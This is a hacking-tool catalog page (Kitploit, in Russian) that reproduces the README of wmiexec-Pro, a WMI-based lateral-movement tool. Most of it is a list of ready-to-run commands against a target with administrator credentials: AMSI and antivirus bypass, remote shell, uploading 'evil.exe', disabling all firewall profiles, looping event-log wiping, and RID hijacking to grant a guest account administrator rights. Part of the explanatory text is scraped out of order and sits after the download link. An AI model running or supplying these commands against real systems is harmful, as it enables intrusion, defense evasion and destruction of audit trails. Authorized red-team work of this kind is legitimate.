Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wmiexec-Pro — New generation of wmiexec.py | Kitploit
Инструменты/GitHubGitHub/xiaolichan/wmiexec-pro
Privilege EscalationPersistence MechanismsLateral MovementInformation GatheringPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubxiaolichan/wmiexec-pro

wmiexec-Pro

New generation of wmiexec.py

Репозиторий
1.3k1513 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

wmiexec-Pro

Новое поколение wmiexec.py.

Содержание

  1. Информация
  2. Особая благодарность
  3. Возможности
  4. Начало работы
    • Установка
  5. Использование
  6. Скриншоты
  7. Как это работает?
  8. Отказ от ответственности
  9. Ссылки

Информация

Новое поколение wmiexec.py, множество новых функций. Все операции работают только с портом 135 (не требуется SMB-подключение) для обхода AV при lateral movement (Windows Defender, HuoRong, 360)

(наверх)

Особая благодарность

@422926799

(наверх)

Возможности

  • Основная функция: обход AV
  • Основная функция: не требуется win32_process
  • Основная функция: нужен только порт 135.
  • Новый модуль: обход AMSI
  • Новый модуль: передача файлов
  • Новый модуль: удалённое включение RDP через метод класса WMI
  • Новый модуль: злоупотребление брандмауэром Windows
  • Новый модуль: циклическая очистка журнала событий
  • Новый модуль: удалённое включение WinRM без обращения к CMD
  • Новый модуль: менеджер служб
  • Новый модуль: RID-Hijack
  • Улучшение: получение вывода выполнения команд новым способом
  • Улучшение: выполнение VBS-файла

(наверх)

Начало работы

Установка

Нужна только последняя версия Impacket

  1. Клонируйте репозиторий impacket
    root@kitploit:~
    git clone https://github.com/fortra/impacket
    
  2. Установите impacket
    root@kitploit:~
    cd impacket && sudo pip3 install .
    
  3. Наслаждайтесь :)
    root@kitploit:~
    git clone https://github.com/XiaoliChan/wmiexec-Pro
    

(наверх)

Использование

root@kitploit:~
python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
   python3 wmiexec-pro.py administrator:[email protected] enum -run

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -shell (Launch a semi-interactive shell)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (Default is with output mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent (Silent mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -save (With output and save output to file)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old -save
   python3 wmiexec-pro.py administrator:[email protected] exec-command -clear (Remove temporary class for command result storage)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -clear (Remove temporary class for file transfer)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable -old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only support win7+):
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall (Only support win8+):
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (Disable all firewall profiles)
   
Services:
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
   python3 wmiexec-pro.py administrator:[email protected] service -action start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action stop -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action disable -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action auto-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action manual-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action getinfo -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action delete -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -dump all-services.json

Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog)

RID Hijack:
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action activate (Activate user)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action deactivate (Deactivate user)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login enable (Enable blank password login)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login disable
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 500 -action backup (This will save user profile data as json file)
   python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)
   python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
   

(наверх)

Скриншоты

  • Справка

  • exec-command

  • filetransfer

    • загрузка файла

    • скачивание файла

(наверх)

Как это работает?

  • Модуль AMSI:

    • Техника Tal-Liberman с blackhat asia 2018.
  • Модуль exec-command:

    • Улучшение предыдущего проекта: wmiexec-RegOut, получение вывода из класса WMI вместо реестра.
  • Модуль filetransfer:

    • Для загрузки: кодирует исходный файл в строки base64 в дроппере WriteFile.vbs, затем создаёт новый экземпляр объекта ActiveScriptEventConsumer для выполнения дроппера.
    • Для скачивания: удалённо создаёт класс для хранения данных, затем выполняет кодировщик LocalFileIntoClass.vbs для кодирования файла и сохранения данных в только что созданный класс.
  • Модуль rdp:

    • Для включения/отключения: службы RDP: управление объектом TerminalServices напрямую.
    • Для включения/отключения Restricted Admin Mode: управление ключом реестра DisableRestrictedAdmin через класс StdRegProv.
  • Модуль winrm:

    • Для включения/отключения: вызов модуля служб.
    • Для правил брандмауэра: используйте модуль firewall.py для настройки брандмауэра WinRM.
  • Модуль firewall:

    • Злоупотребление классами MSFT_NetProtocolPortFilter, , .

(наверх)

Отказ от ответственности

Дух этой инициативы Open Source — помочь исследователям безопасности и сообществу ускорить исследовательскую и образовательную деятельность, связанную с реализацией сетевых протоколов и стеков.

Информация в этом репозитории предназначена для исследовательских и образовательных целей и не предназначена для использования в производственных средах и/или в составе коммерческих продуктов.

Если вы хотите использовать этот код или его часть в своих целях, мы рекомендуем применять надлежащий жизненный цикл разработки безопасного ПО и практики безопасного кодирования, а также генерировать и отслеживать соответствующие индикаторы компрометации в соответствии с вашими потребностями.

(наверх)

Ссылки

  • GhostPack/SharpWMI
  • impacket
  • WMIHACKER
  • Документация Microsoft WMI
  • Документация Microsoft VBScripts

(наверх)

Скачать инструмент
MSFT_NetFirewallRule
MSFT_NetFirewallProfile
  • Модуль service:

    • Злоупотребление классами Win32_Service.
  • Модуль eventlog:

    • Выполнение VBS-скрипта ClearEventlog.vbs без удаления event и consumer.
  • Модуль execute-vbs:

    • Взято из wmipersist.py.
  • Метод classMethodEx:

    • Для создания класса: выполнение VBS-скрипта CreateClass.vbs для создания простого класса. (Почему? Понятия не имею, как использовать метод PutClass в Impacket.)
    • Для удаления класса: вызов метода DeleteClass для удаления класса.